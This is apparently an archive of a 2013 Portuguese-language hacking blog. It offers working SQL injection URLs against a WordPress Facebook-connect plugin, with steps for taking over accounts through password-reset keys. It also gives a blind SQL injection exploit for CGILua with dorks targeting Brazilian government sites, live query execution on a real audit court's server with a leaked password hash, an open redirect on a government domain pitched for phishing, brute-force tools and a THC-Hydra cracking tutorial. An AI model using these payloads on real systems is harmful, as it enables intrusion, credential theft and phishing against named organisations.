Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

segunda-feira, 30 de setembro de 2013

Exploit Wordpress fbconnect_action pei pei pei

Exploit Wordpress
Exploit Wordpress fbconnect_action pei pei pei

DORK['1']:inurl:"/?fbconnect_action=myhome"


http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]

EXPLOIT:
Mostrando user,email,senha(user_login,user_email,user_pass):
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--


Com o email do usuário em mãos, vá até o painel de administrador.

http://VULL.COM/wp-login.php
"click em Lost your password ?"
É peça uma nova senha enviando para o e-mail.


Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa​

http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--


Vamos modificar a senha do usuario com a KEY CAPTURADA

http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
USANDO:
http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA

Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.


EXEMPLO:
http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--



Exploit Editwrx PHP - execução de código remoto

Exploit Editwrx PHP
EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar a função.


Exploit Editwrx PHP

Exploit Editwrx PHP


DORK: site:.com editwrx/wrx.cgi ext:cgi 
BAIXAR: http://pastebin.com/fDaWb3kW

sexta-feira, 27 de setembro de 2013

Garoa Hacker Clube conheça essa idéia.

Com muito prazer venho divulgar o Garoa Hacker Clube.

Com muito prazer venho divulgar o Garoa Hacker Clube

O Garoa Hacker Clube ☂ é um hackerspace localizado na cidade de São Paulo.
Um hackerspace é um laboratório comunitário, aberto e colaborativo que propicia a troca de conhecimento através de uma infraestrutura para que entusiastas de tecnologia realizem projetos em diversas áreas, como eletrônica, software, robótica, segurança, espaçomodelismo, biologia, culinária, audiovisual e artes - ou o que mais a criatividade permitir.
Qualquer pessoa pode frequentar o Garoa gratuitamente, sendo associado ou não.

Conheça essa ideia:
https://garoa.net.br/wiki/Página_principal

quinta-feira, 26 de setembro de 2013

SCANNER INURLBR 1.0 - PHP

SCANNER INURLBR 1.0
[ blog.inurl.com.br ]

    #############################################################
 *  SCANNER INURLBR     1.0
 *  PHP Version         5.4.7
 *  php5-curl           LIB
 *  cURL support enabled
 *  cURL Information 7.24.0
 *  Apache              2.4
 *  allow_url_fopen =   On
 *  Motor de busca      GOOGLE
 *  Permição            Leitura & Escrita 
 *  -------------------------------------------------------------------------------------
 *  BUSCA POSSÍVEIS VULNERABILIDADES
 *  SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
 *  
 *  GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
 *  fb.com/GoogleINURL
 *  twitter.com/GoogleINURL
 *  blog.inurl.com.br
    #############################################################


SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0

SCANNER INURLBR     1.0


Baixar: http://pastebin.com/9tYBp5jK

quarta-feira, 25 de setembro de 2013

Fingerprint simples via CURL, identificando WEB server.

Fingerprint simples via CURL, identificando WEB server. 

CURL é uma ferramenta linha de comando para manipulações de dados e transferências. Fingerprint simples via CURL, identificando WEB server.

O principal benefício da utilização da interface de linha de comando é que você pode usar tanto Windows ou Linux como shell scripts para automatizar URL e muitos processos relacionados.

Comando:
[[email protected] google]# curl -I www.alvo.gov.br

Tutorial relacionado:
http://curl.haxx.se/docs/httpscripting.html

Script login PHP facebook.

Script login PHP facebook.

Script login PHP facebook.

 

Pode facilmente adaptado em um bruteforce web.
Usando...

http://localhost/loginFace.php?arquivo=arquivoCookie01.txt

SCRIPT: http://pastebin.com/yQUJDPE2

Pequenas falhas grandes dores

Pequenas falhas grandes dores

Imagina Spammers colocando suas URLS

http://www.camara.rj.gov.br/head_notes.php?url=URL_COM_ENGENHARIA_SOCIAL
Pequenas falhas grandes dores

Imagina um engenheiro enviando esse link para emails.
De fato a url dá uma segurança para o navegante, mas e o conteúdo ?
Ex:
Com seguinte link abaixo.


http://www.camara.rj.gov.br/head_notes.php?url=https%3A%2F%2Fwww.bradescoabrasuaconta.com.br%2Fconteudo%2Fhome%2FDefault.aspx

http://www.camara.rj.gov.br/head_notes.php?url=http%3A%2F%2Fblog.inurl.com.br

Uma pequena falha, de aparência inofensivo pode acarretar grandes dores de cabeça.

Continuamos na mesma URL porem com nosso conteúdo.
Chamo esse tipo de falha de IFRAME URL criação de um iframe aparte de um Request seja GET OU POST.

sexta-feira, 20 de setembro de 2013

Força bruta form 1.0 - Bruteforce em formularios web

Força bruta form 1.0  

Feito em PHP, Efetua teste de senha em formularios web.
Seja por validação de url logada ou erro de retorno.

Força bruta form 1.0


Em execução com acesso concedido, logo abaixo exemplo de comando utilizado.




  php bruteforms.php urlpost post senhas tipo validação proxy


 Ajuda: ./bruteforms.php ajuda


 Validação[1] por url.

 php bruteforms.php --urlpost='http://url/validarLogin.php' 'usuario=admin&senha=[SENHA]' --arquivo='senhas.txt' --tipo='1' --validar='http://url/admin/index.php'.

 Validação[2] por erro.

 php bruteforms.php --urlpost='http://url/validarLogin.php' 'usuario=admin&senha=[SENHA]' --arquivo='senhas.txt' --tipo='2' --validar='login erro'.


 Referente proxy basta o mesmo ser setado --proxy='exemplo:8080'.



Os campos do post são setados para validação.


 php bruteforms.php --urlpost='http://url/login_vai.php' 'login=admin&password=[SENHA]' --arquivo='senhas.txt' --tipo='1' --validar='http://url/admin/index.php'.

Dow: http://pastebin.com/zmhdUVyM

Assumindo usuário Administrador da maquina windows.

Assumindo usuário Administrador da maquina windows.

Assumindo usuário Administrador da maquina windows.

net user  Seu_Usuraio /random
net user Administrador /random

A senha gerada assumi a senha do administrador local, então cuidado ao utilizar ele não mostra a senha ele troca por uma aleatória.

Ref:http://www.mydigitallife.info/how-to-generate-and-set-random-password-automatically-for-windows-user-accounts/

http://social.technet.microsoft.com/Forums/systemcenter/en-US/557dde32-9fdd-479b-84c9-4a3c7f7e55e0/local-administrator-account-storing-random-password

DORK BUSCA DE EMAIL LIST

DORK BUSCA DE EMAIL LIST

DORK['0'] site:.br [email protected] (hotmail|yahoo|bol) br ext:txt
DORK['1'] site:br title:"index of" @ yahoo br ext:csv

Exemplo de achado:
site:www.contabeis.com.br ext:txt
site:www.tramontina.com.br ext:csv

terça-feira, 17 de setembro de 2013

CGILua 3.2.1 CGI exploit

CGILua 3.2.1 CGI exploit

O CGILua'
é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
O CGILua permite separar o tratamento dos dados e a lógica do processo de geração de páginas, facilitando o desenvolvimento de aplicativos Web em Lua. Uma das vantagens do CGILua é sua capacidade de abstrair o servidor Web utilizado.
Você pode desenvolver um aplicativo em CGILua para um servidor Web e executá-lo em qualquer outro servidor Web compatível com CGILua.
O CGILua é um programa escrito em C onde você embute trechos escritos em Lua. E o executável do CGILua faz toda a comunicação desse trecho Lua com o protocolo http da Internet. Ou seja, ele faz o papel do CGI.


======================================================================
DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"
======================================================================


ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.
Por exemplo, para acessar a página referida pelo ID = 1, o
Seguinte URL é usada:

======================================================================
Exploit - SQL injection
======================================================================

FALHA: /publique/cgi/cgilua.exe/sys/start.htm?sid=1[INJEÇÃO-SQL]

EXPLOIT = /publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


Essa consulta primeiros concatena "F_Login" e colunas "F_Password" do tabela interna "T_Actor" e retorna a primeira linha (graças à "LIMIT 1 DESVIO 0 "statement). Então, ele verifica se o valor ASCII do primeiro caractere retornado é maior do que 97 (a letra 'a'). Se a condição for satisfeita ele irá acionar a função de referência, causando um atraso significativo no servidor resposta (cerca de 4 segundos usando nosso laboratório de testes). Ao repetir a consulta

======================================================================
USANDO Exploit:
======================================================================

http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1[EXPLOIT]


http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


NEM TODOS DÃO CERTO, mas pode gerar um erro que vai te mostrar qual tipo de banco você esta tratando, assim direcionar melhor sua investida.


REF:http://pt.wikipedia.org/wiki/CGILua
REF:http://www.securityfocus.com/archive/1/archive/1/509142/100/0/threaded
Tutorial CGILua 3.2 :http://www.yumpu.com/pt/document/view/5904124/tutorial-cgilua-32

VULNERABILIDADE ENCONTRADA, TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA.

TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA,  TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

Parâmetro GET sem filtro algum, é possível executar consultas dentro do banco sem qualquer filtro ou proteção previa.

PARÂMETRO GET NOME:sql


https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql[COMANDO SQL]&vgRetorna_ID=&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2=&titulo3=&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP=&menuIncludeHTM=&vgNovaJanela=&vgNaoFiltra=&vgSemRodape=1

Executando comandos.
COMANDO: show databases;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+databases%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO show tables;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+tables%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW VARIABLES;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+VARIABLES%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: select user();
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=select+user%28%29%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW PROCESSLIST;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+PROCESSLIST%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================



BANCO:
myConsulta

TABELAS:
Tables_in_myConsulta
coluna
con1
con10
con100
con101
con102
con103
con104
con105
con106
con107
con108
con109
con11



Variable_name Value
back_log 50
basedir /usr/
bdb_cache_size 8388600
bdb_home /var/lib/mysql/
bdb_log_buffer_size 32768
bdb_logdir
bdb_max_lock 10000
bdb_shared_data OFF
bdb_tmpdir /tcdf/temp/tmpMysql/
binlog_cache_size 32768
bulk_insert_buffer_size 8388608
character_set_client latin1
character_set_connection latin1
character_set_database utf8


Id User Host db Command Time State Info
7720512 userCon localhost myConsulta Query 0 SHOW PROCESSLIST



Grants for [email protected]
GRANT USAGE ON *.* TO 'userCon'@'localhost' IDENTIFIED BY PASSWORD '0be2b4be35a0fec8'
GRANT ALL PRIVILEGES ON `myConsulta`.* TO 'userCon'@'localhost' WITH GRANT OPTION

domingo, 15 de setembro de 2013

Buscando sites joomla "1.5" no domínio gov.br

DORK: site:.gov.br "ADMINISTRADOR" joomla "1.5" ext:php

[5] - www.sudmennucci.sp.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[6] - http://www.sudmennucci.sp.gov.br/index.php?option=com_content&view=section&layout=blog&id=3&Itemid=44&limitstart=20
/ HTTP_CODE: 500 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER: Apache

[7] - www.sudmennucci.sp.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 186.202.153.163 / PORTA SERVER: 80 / WEB SERVER:

[8] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2308%3Arelatorio-da-smdr-de-ss02-ate-06-de-setembro-de-2013&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[9] - www.cangucu.rs.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:
[10] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2179%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[11] - www.cangucu.rs.gov.br/index.php?option...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[12] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2291%3Arelatorio-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural-de-19-a-30-de-agosto&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[13] - www.cangucu.rs.gov.br/index.php?...a...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[14] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2203%3Aroteiro-de-servicos-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[15] - www.cangucu.rs.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[16] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=rss
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2
[17] - www.procon.rioverde.go.gov.br/index.php?...id...
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER:

[18] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2102%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[19] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=view&id=6&Itemid=66
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[20] - www.camaralp.mg.gov.br/index.php?option=com...id...
/ HTTP_CODE: 404 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER:

[21] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4912%3Apromotoria-da-saude-de-cg-firma-tac-com-hospitais-para-a-oferta-de-de-dialise&catid=43%3Asaude
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[22] - www.mp.pb.gov.br/index.php?option...id...
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[23] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=frontpage
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[24] - www.cangucu.rs.gov.br/index.php?option=com_content...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[25] - http://www.areial.pb.gov.br/index.php?option=com_content&view=article&id=246%3Aparoquias-de-esperanca-e-areial-promovem-a-xiv-caminhada-penitencial&catid=38%3Anoticias&Itemid=130

[26] - www.areial.pb.gov.br/index.php?option...e...

[27] - http://www.camaralp.mg.gov.br/index.php?option=com_content&task=section&id=9&Itemid=47
/ HTTP_CODE: 500 / IP SERVER: 208.43.27.18 / PORTA SERVER: 80 / WEB SERVER: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

[28] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1964%3Arelatorio-semanal-da-smdr&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[29] - www.cangucu.rs.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER:

[30] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=4076%3Aresolucao-regulamenta-atribuicoes-dos-cargos-criados-na-area-de-ti-criados-pela-lei-971512&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[31] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3678%3Amp-constitui-comissao-para-concurso-na-area-de-tecnologia-da-informacao&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[32] - www.mp.pb.gov.br/index.php?option=com...
/ HTTP_CODE: 404 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER:

[33] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=3702%3Amppb-devera-lancar-edital-de-concurso-na-area-de-ti-ainda-em-junho&catid=34%3Agerais
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

[34] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2207%3Asecretario-acompanha-trabalho-de-equipes-do-interior&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[35] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2153%3Aprefeito-participa-de-audiencia-publica-na-camara&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[36] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1640%3Arelatorio-semanal-de-atividades-da-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[37] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=1704%3Arelatorio-semanal-de-atividades-desempenhadas-pela-secretaria-de-desenvolvimento-rural&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)
[38] - http://ead.florestadigital.ac.gov.br/mod/glossary/view.php?id=104&mode=letter&hook=ALL&sortkey&sortorder=asc&fullsearch=0&page=-1
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[39] - http://ead.florestadigital.ac.gov.br/mod/glossary/print.php?id=104&mode=cat&hook=-1&sortkey&sortorder=asc&offset=-10
/ HTTP_CODE: 303 / IP SERVER: 187.6.85.56 / PORTA SERVER: 80 / WEB SERVER: Array

[40] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=2139%3Aprefeito-recebe-reportagem-da-radio-cultura-am&catid=60%3Adestaque&Itemid=257
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[41] - http://www.cangucu.rs.gov.br/index.php?option=com_content&view=article&id=366%3Ainaugurada-em-cangucu-fase-inicial-da-energia-eolica&catid=61%3Amural&Itemid=256
/ HTTP_CODE: 200 / IP SERVER: 187.17.80.67 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.3 (CentOS)

[42] - http://www.procon.rioverde.go.gov.br/index.php?option=com_content&view=category&id=42&Itemid=234&format=feed&type=atom
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[43] - http://www.procon.rioverde.go.gov.br/index.php
/ HTTP_CODE: 200 / IP SERVER: 200.230.61.133 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2

[44] - http://www.mp.pb.gov.br/index.php?option=com_content&view=article&id=1069%3Aseminario-mostra-como-transformar-o-lixo-em-fonte-de-renda&catid=46%3Ameioambiente&Itemid=122
/ HTTP_CODE: 200 / IP SERVER: 200.199.79.93 / PORTA SERVER: 80 / WEB SERVER: Apache/2.2.16 (Debian)

TUTORIAL BÁSICO THC-HYDRA [PT-BR]

Tutorial Thc-Hydra

TUTORIAL BASICO THC-HYDRA [PT-BR]

 _   _               _               _           
| |_| |__   ___     | |__  _   _  __| |_ __ __ _ 
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
 \__|_| |_|\___|    |_| |_|\__, |\__,_|_|  \__,_|
                           |___/    TUTORIAL BASICO THC-HYDRA [PT-BR]


_________________________________________________________________________________
- Por : MDH3LL
- Contato : [email protected]
- Data 10/04/2010
_________________________________________________________________________________


INDICE :
_________________________________________________________________________________
-0x00 - Instalando THC-HYDRA no (Windows XP).
-0x01 - Executando.
-0x02 - Opções.
-0x03 - Exemplos{
 -- Exemplo (1) FTP
 -- Exemplo (2) http-head
 -- Exemplo (3) http-post-form
 -- Exemplo (4) POP3
-0x04 - Proxy.
_________________________________________________________________________________

* THC-Hydra:Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de 
senhas e nomes de usuários ate chegar ao seu objetivo obvio.

Protocolos suportados atualmente na versão 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
=================================================================================
[0x00] Instalando THC-HYDRA no (Windows XP) :
=================================================================================
O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.

-> Criar uma variável de ambiente em :
painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
exemplo: C:\hydra-5.4-win;

=================================================================================
[0x01] Executando :
=================================================================================
Rode 'hydra' no prompt de comandos para chamar o programa.

/////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC 

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -C FILE   colon seperated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -w TIME   defines the max wait time in seconds for responses (default: 30)
  -v / -V   verbose mode / show login+pass combination for each attempt
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
  OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e 
as opções seguidas de comentários.

=================================================================================
[0x02] Opções :
=================================================================================

 -R Restaura sessões abordadas/quebradas.
 -S Conexão segura usando SSL caso seja necessário.
 -s Especifica qual porta o hydra vai estabelecer a conexão.
 -l Nome|login da vitima.
 -L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
 -p Especifica senha única.
 -P Carrega uma lista com senhas.(1 por linha)
 -e ns adcional 'n' testa senha em branco || adicional 's' testa user como pass.
 -C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
 -M Carrega lista de servidores alvos.(1 por linha)
 -o Salva as senhas encontradas dentro do arquivo que você especificar.
 -f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
 -t Limita o numero de solicitações por vez.(default: 16)
 -w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
 -v / -V Modo verbose do programa. 'V' mostra todas tentativas.

Server: Servidor alvo. 
Exemplos: 
 127.0.0.1
 localhost
 pop.gmail.com
 pop.mail.yahoo.com.br 
 pop3.live.com 

Service: Protocolo||Serviço que sera chamado|usado.
Exemplos:
 pop3
 ftp
 smtp
 vnc 
 imap
 http-head
 http-post-form

=================================================================================
[0x03] Exemplos:
=================================================================================
Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial. 

Exemplo (1) FTP
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: root   password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
